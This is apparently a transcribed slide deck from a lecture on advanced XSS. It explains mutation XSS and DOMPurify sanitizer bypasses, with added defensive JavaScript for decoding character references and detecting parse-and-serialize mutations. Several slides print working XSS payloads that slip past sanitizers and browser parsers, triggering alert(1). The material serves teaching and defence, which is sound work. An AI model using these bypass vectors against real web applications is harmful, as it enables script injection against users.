
Web & Browser Security Day Two - PowerPoint PPT Presentation



  1. Web & Browser Security Day Two: Advanced XSS
  A lecture by Dr.-Ing. Mario Heiderich
  mario@cure53.de || mario.heiderich@rub.de
  This is the day where we cover crazy stuff. Crazy.

  2. Our Dear Lecturer
  ● Dr.-Ing. Mario Heiderich
  ● Ex-Researcher and now Lecturer, Ruhr-Uni Bochum
  ● PhD Thesis about Client Side Security and Defense
  ● Founder & Director of Cure53
  ● Pentest & Security Firm located in Berlin
  ● Security, Consulting, Workshops, Trainings
  ● Ask for an internship if the force is strong with you
  ● Published Author and Speaker
  ● Specialized in HTML5, DOM and SVG Security
  ● JavaScript, XSS and Client Side Attacks
  ● Maintains DOMPurify
  ● A top-notch JS-only sanitizer; also a couple of other projects
  ● Can be contacted but prefers not to be
  ● mario@cure53.de
  ● mario.heiderich@rub.de

  3. Act One: Advanced XSS

  4. And, before we get started, let's think about Self-XSS. And one kind of CSRF. And how we can abuse that.

  5. [...]

  6. Mutations in the DOM: mXSS
  ● This attack is basically a nightmare come true. Browsers turned against web apps.
  ● Imagine the browser turns harmless HTML into a dangerous attack vector.
  ● The server will assume sane markup and no risk.
  ● This issue indeed exists, first reported in 2006
  ● „Broken Print-Preview“ http://is.gd/fLVScq
  ● String mutation in certain DOM properties
  ● Result: µXSS, mXSS or “Mutation XSS”
  ● Back then, affected applications and libraries: 2+ million libraries according to GitHub
  ● Yay!
  ● 6+ vector classes, affecting webmailers and everyone with an RTE (DEMO)
  ● Yahoo! Mail, OWA, Hotmail, SharePoint, etc.
  ● And DOMPurify of course, massively so
  ● Let's have a closer look at this!

  7. Or, to be more clear
  ● Attacker submits HTML
  ● Server receives it to sanitize
  ● Says, that looks safe, all fine
  ● Sends it back to browser
  ● Browser receives HTML
  ● Renders it initially, all fine
  ● Some DOM logic fiddles with it
  ● Browser re-renders, HTML mutates
  ● Injected JavaScript activates and fires

  8. New Variations
  Both vectors identified and published by Gareth Heyes:
  <%/z=%&gt&lt;p/&#111;nresize&#x3d;alert(1)//>
  <div='/x=&#39&gt&lt;iframe/onload=alert(1)&gt>
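Both vectors rely on HTML character references hiding markup from anything that inspects the raw string. The decoder below is an added example written for this page (not code from the slides or from Gareth Heyes); it applies the tokenizer rules these vectors depend on: numeric references decode with or without the trailing semicolon, the legacy names lt/gt/amp/quot decode without a semicolon too, and inside an attribute value a legacy name followed by "=" or an alphanumeric is left alone (so "?a=1&gt=2" survives as a URL). The named table is a deliberately tiny assumption; a real decoder needs the full HTML entity list. `smuggledTags` is a helper added here to list the tag names that only exist after decoding.

```javascript
// Added example, not from the slides: HTML character-reference decoding and
// a check for markup that only appears after decoding.

// Tiny named table (assumption for brevity; the real list has 2000+ names).
const NAMED = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };
// Legacy names the HTML tokenizer also accepts WITHOUT a trailing ';'.
const LEGACY_NO_SEMI = new Set(['lt', 'gt', 'amp', 'quot']);
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

function decodeCharRefs(input, { inAttribute = false } = {}) {
  const ref = /&(#[xX][0-9a-fA-F]+|#[0-9]+|[a-zA-Z][a-zA-Z0-9]*)(;?)/g;
  return input.replace(ref, (match, body, semi, offset, whole) => {
    const next = whole[offset + match.length] ?? '';
    if (body[0] === '#') {
      // Numeric references decode even when the ';' is missing.
      const hex = body[1] === 'x' || body[1] === 'X';
      const cp = parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10);
      // NUL, surrogates and out-of-range values become U+FFFD, as in browsers.
      if (cp === 0 || cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff)) return '\uFFFD';
      return String.fromCodePoint(cp);
    }
    if (!hasOwn(NAMED, body)) return match;          // unknown name stays literal
    if (semi === '') {
      if (!LEGACY_NO_SEMI.has(body)) return match;   // e.g. &apos needs the ';'
      // Attribute-value rule: "&gt=" or "&ltx" is not a reference.
      if (inAttribute && /[=A-Za-z0-9]/.test(next)) return match;
    }
    return NAMED[body];
  });
}

// Tag names present after decoding but absent before: markup that a
// string-level filter never saw as markup.
function smuggledTags(raw, opts) {
  const tags = (s) =>
    (s.match(/<\/?[a-zA-Z][a-zA-Z0-9-]*/g) || []).map((t) => t.toLowerCase());
  const visible = new Set(tags(raw));
  return tags(decodeCharRefs(raw, opts)).filter((t) => !visible.has(t));
}

// The two vectors from the slide; vector 2 reduced to its attribute value.
const VECTOR_TEXT = '<%/z=%&gt&lt;p/&#111;nresize&#x3d;alert(1)//>';
const VECTOR_ATTR_VALUE = '/x=&#39&gt&lt;iframe/onload=alert(1)&gt';

console.log(decodeCharRefs(VECTOR_TEXT));                              // <%/z=%><p/onresize=alert(1)//>
console.log(decodeCharRefs(VECTOR_ATTR_VALUE, { inAttribute: true })); // /x='><iframe/onload=alert(1)>
console.log(smuggledTags(VECTOR_TEXT));                                // [ '<p' ]
```

The attribute-value rule matters in both directions: a filter that decodes everything eagerly will flag URLs like `?a=1&gt=2`, while one that requires a semicolon misses `&#39&gt`, which the browser decodes without one.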

  9. Other Browsers
  Firefox cannot be trusted with innerHTML and SVG:
  <script>
  document.write('<svg><p><style><img src="</style><img src=x onerror=alert(1)//">')
  </script>
  Chrome cannot be trusted with Unicode (sadly fixed in Chrome 62); &#x3000; is U+3000 IDEOGRAPHIC SPACE:
  <a href=&#x3000;javascript:alert(1)>CLICK

  10. Other Browsers
  Chrome recently fixed another mXSS problem:
  <math><annotation-xml encoding="text/html"><xmp>&lt;/xmp>&lt;img src=x onerror=alert(1)></xmp></annotation-xml></math>

  11. Check out the video! https://is.gd/oRNBLZ
  And all the code! https://is.gd/SdP0SK

  12. But it gets worse
  ● Autumn 2019 was mXSS season. Sadly for us.
  ● DOMPurify got hit by a good dozen bypasses
  ● First found by a 3rd party, Michał Bentkowski
  ● The rest then found “internally”
  ● There were two root causes
  ● An internal switch in document types changes the parser type
  ● A sudden change in document structure changes the parser type

  13. mXSS Root-Cause One
  ● An internal switch in document types changes the parser type
  ● The browser thinks it’s XML, then thinks it’s HTML
  ● Once that “reconsideration” happens, HTML gets interpreted differently
  ● This causes bypasses, even and especially in DOM sanitizers like DOMPurify

  14. <svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
  As submitted: <style> sits inside <svg>, so it is a foreign element whose children are parsed as markup, and the "</style><img ...>" is nothing but the value of the id attribute of an <a>. A DOM sanitizer sees <svg>, <p>, <style>, <a> and one attribute; nothing to remove.

  16. <svg><p></p><style><a id="</style><img src=1 onerror=alert(1)>">
  After one innerHTML round trip: the stray </p> has been serialized as <p></p>. On the next parse, the <p> start tag breaks out of the SVG, <style> is now an HTML style element whose content is raw text, the "</style>" inside the attribute value closes it, and <img src=1 onerror=alert(1)> becomes a real element.

  17. mXSS Root-Cause Two
  ● A sudden change in document structure changes the parser type
  ● The switch is triggered by, for example, element removal
  ● Browser thinks XML, element gets removed, browser now thinks HTML
  ● And as that happens, the HTML gets interpreted differently

  18. <noembed><svg><b><style><b title='</style><img src=x onerror=alert(1)>'>
  As submitted: <noembed> is a raw text element, so everything after it is one text node. The sanitizer sees no <svg>, no <style> and no <img>, only text.

  20. This element we don’t want, let’s remove it: <noembed>
  <noembed><svg><b><style><b title='</style><img src=x onerror=alert(1)>'>

  21. And boom, we force the parser into XML-mode because SVG. Harmless becomes harmful.
  (<noembed> removed) <svg><b><style><b title='</style><img src=x onerror=alert(1)>'>
  Once the wrapper is gone and the remaining characters are re-parsed, <svg> is real, the parser switches into foreign content and back out again at <b>, <style> ends up as an HTML raw text element, and the "</style>" inside the title attribute closes it and exposes the <img>.
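Every case on slides 7, 13 to 16 and 17 to 21 has the same shape: the sanitizer approved one string, and the browser's own parse/serialize cycle turned it into a different string before rendering it. The harness below is an added example written for this page (not code from the slides and not DOMPurify's implementation) that makes that shape the test: sanitizer output must be a fixed point of one round trip, otherwise it is rejected and the two differing forms are returned for inspection. `domRoundTrip` is the real adapter for a browser and uses DOMParser so the input stays inert while it is checked; `constructedRoundTrip` is a stand-in that only reproduces the single rewrite shown on slides 14 to 16 so the harness can run without a DOM, and is not an HTML parser.

```javascript
// Added example, not from the slides: treat "does one parse/serialize cycle
// change the markup?" as the mXSS test for sanitizer output.

// Run `html` through `roundTrip` (parse + serialize) until it stops changing.
// history[0] is the input; history[1], if present, is the first rewritten form.
function mutationReport(html, roundTrip, maxRounds = 5) {
  const history = [html];
  for (let i = 0; i < maxRounds; i++) {
    const current = history[history.length - 1];
    const next = roundTrip(current);
    if (next === current) {
      return { mutated: history.length > 1, stable: true, history };
    }
    history.push(next);
  }
  // Still changing after maxRounds: never trust it.
  return { mutated: true, stable: false, history };
}

// Wrap any sanitizer: refuse output the browser would rewrite, instead of
// trusting that the approved string is the string that gets rendered.
function sanitizeStable(dirty, sanitize, roundTrip) {
  const clean = sanitize(dirty);
  const report = mutationReport(clean, roundTrip);
  if (report.mutated) {
    return {
      ok: false,
      output: '',
      before: report.history[0],   // what the sanitizer approved
      after: report.history[1],    // what the browser would parse next
    };
  }
  return { ok: true, output: clean };
}

// Browser adapter. DOMParser documents have no browsing context, so image
// loads and inline handlers in the tested markup do not fire during the check.
// Callable only where a DOM exists (a browser, or jsdom in Node).
function domRoundTrip(html) {
  const doc = new DOMParser().parseFromString(html, 'text/html');
  return doc.body.innerHTML;
}

// Constructed stand-in for environments without a DOM. NOT a parser: it only
// performs the one rewrite slides 14-16 show (</p> inside <svg> becomes
// <p></p>) so the harness logic can be exercised offline.
function constructedRoundTrip(html) {
  return html.replace('<svg></p>', '<svg><p></p>');
}

// Vector from slide 14, as quoted there.
const SLIDE_14 = '<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">';

if (typeof DOMParser !== 'undefined') {
  // In a browser this shows the real mutation chain for the slide vector.
  console.log(mutationReport(SLIDE_14, domRoundTrip).history);
} else {
  console.log(mutationReport(SLIDE_14, constructedRoundTrip).history);
}
```

The round trip used for the check should match the cycle the application actually performs: an app that moves markup via innerHTML on a <div> and one that parses a whole document can get different trees for the same string, so the DOMParser adapter is a sound default for keeping payloads inert but not a substitute for testing the real insertion point.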
